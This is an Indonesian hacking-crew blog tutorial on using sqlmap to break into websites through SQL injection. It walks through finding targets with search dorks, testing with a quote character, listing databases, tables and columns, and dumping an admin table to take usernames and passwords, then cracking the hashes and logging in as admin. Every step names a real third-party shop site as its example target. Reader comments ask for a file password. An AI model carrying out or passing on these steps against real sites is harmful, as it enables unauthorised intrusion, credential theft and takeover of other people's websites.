HSS Cyber Crew- Assalamualaikum Wr.Wb Gan. Langsung aja Cuwk :p
SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.
Bahan:
Dork Sakti Kalian :D
Langkah-Langkah
Untuk mengetahui website yang kalian mau Inject itu Vuln atau tidak , silahkan kasih tanda ( ' ) di akhir url target, contoh : http://www.sterlingsilver-jewelry.com/subcategory.php?cat=6 saya tambahin ' menjadi
http://www.sterlingsilver-jewelry.com/subcategory.php?cat=6'
Nah kalo vuln nanti ada tulisan
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''6''' at line 1 dan sebagainya"
Berarti vuln :p
1. Setelah instal python, sekarang kalian extrack SQLMAPnya di Drive C:, setelah di extrack buka CMD kemudian masuk kedDrive C: dengan Mengetik cd.. 2x . kemudian cd\sqlmap\ , maka hasilnya akan seperti ini :
Sekarang Mari kita Coba :D dengan mengetikkan ini
sqlmap.py -u http://www.BUGWEBTARGET.com --dbs
Contoh Target : sqlmap.py -u http://www.sterlingsilver-jewelry.com/subcategory.php?cat=6 --dbs , tekan [ENTER]
3. Tuh kan keliatan DATABASE nya :D , sekarang waktunya kita scan dengan perintah :
sqlmap.py -u http://TARGET.com -D nama_database -tables
Contoh Target : sqlmap.py -uhttp://www.sterlingsilver-jewelry.com/subcategory.php?cat=61 -D sukhente_sterling --tables , maka hasilnya akan seperti ini :
4. Nah keliatan kan Table di databasenya ? nah sekarang kita scan table tersebut (*cari yang menurut kalian terdapat info tentang user dan pass website) kalo udah yakin disana ada infonya, ketikan perintah :
sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns
Contoh Target : sqlmap.py -u http://www.sterlingsilver-jewelry.com/subcategory.php?cat=6 -D sukhente_sterling -T admin --columns , tekan enter maka hasilnya akan seperti ini :
5. Nah setelah keliatan Tabelnya sekarang kita ketikan perintah :
sqlmap.py -u http://www.target.com -D nama_database -T nama_table --dump
Contoh Target : sqlmap.py -u http://www.sterlingsilver-jewelry.com/subcategory.php?cat=6 -D sukhente_sterling -T admin --dump , klik enter
nah itu kita dapetin User + Passwordnya :D
Nah Kalau Password nya berbentuk Hash Kalian harus mendecryptnya :D
Nah Sekarang Tinggal Cari Admin Login nya :D
Sekian Totur Sederhana dari Saya, Mohon Maaf bila ada Yg salah :D
4 komentar:
pass filenya apaan ?
passwordnya apa gan?
Bos pasword pyton apaan...?
Passnya apaan kang
Posting Komentar